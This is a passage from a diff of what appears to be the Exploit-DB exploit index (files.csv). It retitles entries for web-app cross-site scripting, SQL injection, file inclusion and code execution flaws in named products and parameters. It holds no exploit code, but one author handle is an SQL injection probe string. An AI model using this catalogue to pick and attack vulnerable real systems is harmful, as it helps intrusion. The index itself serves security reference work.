Uploadify Integration 0.9.6 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0 37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 - Local File Inclusion / SQL Injection",2012-04-09,wacky,php,webapps,0 @@ -35919,10 +35920,10 @@ id,file,description,date,author,platform,type,port 37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0 37074,platforms/php/webapps/37074.txt,"WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0 37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 - Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80 -37075,platforms/php/webapps/37075.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - agenda-widget-form.php title Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37076,platforms/php/webapps/37076.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - box_publish_button.php button_value Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37077,platforms/php/webapps/37077.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - save_successful.php msg Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 -37078,platforms/php/webapps/37078.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Parameter Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37075,platforms/php/webapps/37075.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget-form.php?title' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37076,platforms/php/webapps/37076.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'box_publish_button.php?button_value' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37077,platforms/php/webapps/37077.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'save_successful.php?msg' Cross-Site Scripting",2012-04-11,"High-Tech Bridge SA",php,webapps,0 +37078,platforms/php/webapps/37078.txt,"WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-11,"High-Tech Bridge SA",php,webapps,0 37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 - Multiple SQL Injections",2015-05-21,"Filippo Roncari",php,webapps,80 37080,platforms/php/webapps/37080.txt,"WordPress Plugin WP Symposium 15.1 - '&show=' SQL Injection",2015-05-21,"Hannes Trunde",php,webapps,80 37082,platforms/php/webapps/37082.txt,"Bioly 1.3 - 'index.php' Cross-Site Scripting / SQL Injection",2012-04-16,T0xic,php,webapps,0 @@ -35932,21 +35933,21 @@ id,file,description,date,author,platform,type,port 37086,platforms/php/webapps/37086.txt,"WordPress Plugin Yahoo Answer - Multiple Cross-Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 - 'login' HTML Injection",2012-04-17,"Marcos Garcia",php,webapps,0 37090,platforms/php/webapps/37090.txt,"Joomla! Component JA T3 Framework - Directory Traversal",2012-04-17,indoushka,php,webapps,0 -37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'Username' Parameter Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 -37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php to_userid' Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 -37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Parameter Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 +37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 - 'Username' Cross-Site Scripting",2012-04-17,"Aung Khant",php,webapps,0 +37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 - '/modules/pm/pmlite.php?to_userid' Cross-Site Scripting",2012-04-18,"High-Tech Bridge SA",php,webapps,0 +37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-18,"High-Tech Bridge SA",php,webapps,0 37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 - 'index.php' redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0 -37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Parameter Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 -37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 +37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 - 'Username' Cross-Site Scripting",2012-04-20,sonyy,php,webapps,0 +37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37253,platforms/php/webapps/37253.txt,"WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read",2015-06-10,Kuroi'SH,php,webapps,0 37254,platforms/php/webapps/37254.txt,"WordPress Plugin History Collection 1.1.1 - Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80 37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0/5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS - 'products_xx.php' SQL Injection / HTML Injection",2012-04-20,TheCyberNuxbie,php,webapps,0 -37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 +37101,platforms/php/webapps/37101.txt,"Joomla! Component CCNewsLetter 1.0.7 - 'id' SQL Injection",2012-04-23,E1nzte1N,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Component com_videogallery - Local File Inclusion / SQL Injection",2012-04-24,KedAns-Dz,php,webapps,0 37103,platforms/php/webapps/37103.txt,"Concrete5 CMS 5.5.2.1 - Information Disclosure / SQL Injection / Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 -37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 -37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Parameter Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37104,platforms/php/webapps/37104.txt,"gpEasy 2.3.3 - 'jsoncallback' Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 +37105,platforms/php/webapps/37105.txt,"Quick.CMS 4.0 - 'p' Cross-Site Scripting",2012-04-26,"Jakub Galczyk",php,webapps,0 37106,platforms/php/webapps/37106.txt,"WordPress Plugin Video Gallery 2.8 - Arbitrary Mail Relay",2015-05-26,"Claudio Viviani",php,webapps,80 37107,platforms/php/webapps/37107.txt,"WordPress Plugin NewStatPress 0.9.8 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 37108,platforms/php/webapps/37108.txt,"WordPress Plugin Landing Pages 1.8.4 - Multiple Vulnerabilities",2015-05-26,"Adrián M. F.",php,webapps,80 @@ -35959,38 +35960,38 @@ id,file,description,date,author,platform,type,port 37115,platforms/perl/webapps/37115.txt,"ClickHeat 1.13+ - Remote Command Execution",2015-05-26,"Calum Hutton",perl,webapps,0 37116,platforms/php/webapps/37116.py,"Silverstripe CMS 2.4.7 - install.php PHP Code Injection",2012-04-27,"Mehmet Ince",php,webapps,0 37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 - Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0 -37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Parameter Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 -37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Parameter Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 -37120,platforms/php/webapps/37120.txt,"Uiga FanClub - 'p' Parameter SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 +37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 - 'encode' Cross-Site Scripting",2012-04-27,farbodmahini,php,webapps,0 +37119,platforms/asp/webapps/37119.txt,"XM Forum - 'id' Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 +37120,platforms/php/webapps/37120.txt,"Uiga FanClub - 'p' SQL Injection",2012-04-27,"Farbod Mahini",php,webapps,0 37121,platforms/asp/webapps/37121.txt,"BBSXP CMS - Multiple SQL Injections",2012-04-27,"Farbod Mahini",asp,webapps,0 -37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' Parameter SQL Injection",2012-04-28,eidelweiss,php,webapps,0 -37123,platforms/php/webapps/37123.txt,"WordPress Plugin WPsc MijnPress - 'rwflush' Parameter Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 -37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 - restore.php Filename Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 -37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 - install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 -37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 - install.php Multiple Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 -37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 - sql.php Multiple Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 -37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 - filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 -37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0 -37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 - main.php Multiple Function Cross-Site Request Forgery",2012-04-27,AkaStep,php,webapps,0 +37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 - 'id' SQL Injection",2012-04-28,eidelweiss,php,webapps,0 +37123,platforms/php/webapps/37123.txt,"WordPress Plugin WPsc MijnPress - 'rwflush' Cross-Site Scripting",2012-04-30,Am!r,php,webapps,0 +37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 - 'restore.php?Filename' Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 +37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 - 'install.php?language' Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0 +37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 - 'install.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-27,AkaStep,php,webapps,0 +37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 - 'sql.php' Multiple Cross-Site Scripting Vulnerabilities",2012-04-27,AkaStep,php,webapps,0 +37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 - 'filemanagement.php?f' Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0 +37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 - Multiple Script Direct Request Information Disclosures",2012-04-27,AkaStep,php,webapps,0 +37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 - 'main.php' Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,AkaStep,php,webapps,0 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php' page Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0 37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution",2012-04-27,AkaStep,php,webapps,0 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0 -37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 +37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Bypass",2012-05-07,L3b-r1'z,php,webapps,0 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 -37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC - plugins/ajaxCalls/haltResumeHsp.php newHspStatus Parameter Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC - templates/hrfunct/emppop.php sortOrder1 Parameter Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - 'plugins/ajaxCalls/haltResumeHsp.php?hspSummaryId' SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37143,platforms/php/webapps/37143.txt,"OrangeHRM 2.7 RC - 'plugins/ajaxCalls/haltResumeHsp.php?newHspStatus' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 +37144,platforms/php/webapps/37144.txt,"OrangeHRM 2.7 RC - 'templates/hrfunct/emppop.php?sortOrder1' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37145,platforms/php/webapps/37145.txt,"OrangeHRM 2.7 RC - 'index.php' URI Parameter Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 37146,platforms/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",php,webapps,0 -37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 - Upload/engine.php v Parameter Cross-Site Scripting",2012-05-10,AkaStep,php,webapps,0 -37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 +37147,platforms/php/webapps/37147.txt,"Chevereto 1.91 - 'Upload/engine.php?v' Cross-Site Scripting",2012-05-10,AkaStep,php,webapps,0 +37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 - 'Upload/engine.php?v' Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 - Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller - Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 -37155,platforms/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Parameter Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 +37155,platforms/php/webapps/37155.txt,"WordPress Plugin WP-FaceThumb 0.1 - 'pagination_wp_facethum' Cross-Site Scripting",2012-05-13,d3v1l,php,webapps,0 37161,platforms/php/webapps/37161.txt,"WordPress Plugin GRAND Flash Album Gallery 1.71 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37162,platforms/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37166,platforms/php/webapps/37166.php,"WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload",2015-06-01,"nabil chris",php,webapps,0 @@ -36005,21 +36006,21 @@ id,file,description,date,author,platform,type,port 37182,platforms/php/webapps/37182.txt,"WordPress Plugin LeagueManager 3.9.11 - SQL Injection",2015-06-02,javabudd,php,webapps,0 37189,platforms/php/webapps/37189.txt,"WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37190,platforms/php/webapps/37190.txt,"WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37191,platforms/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37193,platforms/php/webapps/37193.txt,"WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37191,platforms/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - 'leaflet_layer.php?id' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - 'leaflet_marker.php?id' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37193,platforms/php/webapps/37193.txt,"WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37194,platforms/php/webapps/37194.txt,"WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 -37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - 'fs-admin/fs-admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37196,platforms/php/webapps/37196.txt,"WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37200,platforms/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",php,webapps,80 37201,platforms/php/webapps/37201.txt,"WordPress Plugin Sharebar 1.2.1 - SQL Injection / Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37202,platforms/php/webapps/37202.txt,"WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37203,platforms/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37203,platforms/php/webapps/37203.txt,"WordPress Plugin Soundcloud Is Gold 2.1 - 'width' Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37204,platforms/php/webapps/37204.txt,"WordPress Plugin Track That Stat 1.0.8 - Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Parameter Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 -37206,platforms/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - demo/PHPThumb.demo.showpic.php title Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 -37207,platforms/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - demo/PHPThumb.demo.random.php dir Parameter Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 -37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Parameter Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 +37205,platforms/php/webapps/37205.txt,"LongTail JW Player - 'debug' Cross-Site Scripting",2012-05-16,gainover,php,webapps,0 +37206,platforms/php/webapps/37206.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - 'demo/PHPThumb.demo.showpic.php?title' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 +37207,platforms/php/webapps/37207.txt,"SiliSoftware PHPThumb() 1.7.11-201108081537 - 'demo/PHPThumb.demo.random.php?dir' Cross-Site Scripting",2012-05-16,"Gjoko Krstic",php,webapps,0 +37208,platforms/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,php,webapps,0 37209,platforms/php/webapps/37209.txt,"WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion",2015-06-05,Kuroi'SH,php,webapps,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal / Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 37214,platforms/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps,0 @@ -36029,13 +36030,13 @@ id,file,description,date,author,platform,type,port 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 -37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 +37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/file_upload_submit.asp' Multiple Arbitrary File Upload / Code Executions",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 -37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 +37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 37226,platforms/php/webapps/37226.txt,"Concrete5 FlashUploader - Arbitrary '.SWF' File Upload",2012-05-20,AkaStep,php,webapps,0 37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'index.php' id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0 -37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple Parameter SQL Injections",2012-06-03,KedAns-Dz,php,webapps,0 +37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple SQL Injections",2012-06-03,KedAns-Dz,php,webapps,0 37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,php,webapps,0 37353,platforms/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",php,webapps,0 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQL Injection",2015-06-09,Pancaker,php,webapps,0 @@ -36058,9 +36059,9 @@ id,file,description,date,author,platform,type,port 37308,platforms/php/webapps/37308.txt,"Ruubikcms 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 -37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 +37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 -37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 +37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - 'includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php?img_url' Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0 37315,platforms/php/webapps/37315.txt,"PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0 37257,platforms/php/webapps/37257.txt,"FiverrScript - Cross-Site Request Forgery (Add Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80 @@ -36091,16 +36092,16 @@ id,file,description,date,author,platform,type,port 37322,platforms/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps,0 37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete",2015-06-19,Vulnerability-Lab,hardware,webapps,0 37325,platforms/multiple/webapps/37325.txt,"Lively Cart - SQL Injection",2015-06-19,"Manish Tanwar",multiple,webapps,0 -37328,platforms/php/webapps/37328.php,"Small-Cms - 'hostname' Parameter Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 +37328,platforms/php/webapps/37328.php,"Small-Cms - 'hostname' Remote PHP Code Injection",2012-05-26,L3b-r1'z,php,webapps,0 37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 - 'member.php' SQL Injection",2012-06-06,MR.XpR,php,webapps,0 -37356,platforms/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Parameter Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 +37356,platforms/php/webapps/37356.txt,"WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure",2012-06-07,"Sammy FORGIT",php,webapps,0 37357,platforms/php/webapps/37357.php,"WordPress Plugin VideoWhisper Video Presentation 3.17 - 'vw_upload.php' Arbitrary File Upload",2012-06-07,"Sammy FORGIT",php,webapps,0 37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 - Cross-Site Request Forgery (Multiple Application Function)",2012-05-31,"Shadman Tanjim",php,webapps,0 37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 - 'KnowledgeBase.php' search Parameter Cross-Site Scripting",2012-05-31,"Shadman Tanjim",php,webapps,0 -37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 +37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 - 'nsextt' Cross-Site Scripting",2012-06-01,Aboud-el,php,webapps,0 37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 - Arbitrary File Upload / Cross-Site Request Forgery",2012-06-03,KedAns-Dz,php,webapps,0 37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 - 'index.php' page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 -37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 +37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 - 'admin/admin.php?do' Traversal Local File 